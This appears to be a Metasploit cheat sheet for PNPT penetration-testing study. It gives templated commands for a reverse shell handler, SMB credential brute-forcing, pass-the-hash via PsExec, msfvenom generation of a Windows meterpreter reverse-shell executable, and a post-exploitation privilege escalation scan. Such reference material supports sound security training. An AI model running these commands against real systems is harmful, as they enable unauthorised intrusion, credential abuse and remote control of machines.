Reverse Shell Handler

Set up a multi-handler to listen for incoming connections from a payload.

msfconsole -q -x "use multi/handler; set payload {{payload}}; set LHOST {{lhost}}; set LPORT {{lport}}; exploit"

SMB Login Scanner

Test credentials against a range of systems using SMB.

use auxiliary/scanner/smb/smb_login
set RHOSTS {{target_range}}
set SMBUser {{user}}
set SMBPass {{password}}
run

Pass-the-Hash with PsExec

Gain command execution on a target using an NTLM hash.

use exploit/windows/smb/psexec
set RHOSTS {{target_ip}}
set SMBUser {{user}}
set SMBPass {{lm_hash}}:{{ntlm_hash}}
exploit

Payload Generation (msfvenom)

Create a standalone payload for reverse shell execution.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={{kali_ip}} LPORT={{lport}} -f exe -o {{output_file}}

Post-Exploitation: Local Exploit Suggester

Identify potential privilege escalation paths on a compromised system.

use post/multi/recon/local_exploit_suggester
set SESSION {{session_id}}
run

Description

The Metasploit Framework is a comprehensive platform for penetration testing and exploitation. In PNPT, it is used for handling reverse shells, performing automated vulnerability scanning, and executing common exploits. It is also an essential tool for privilege escalation research through its local exploit suggester.

References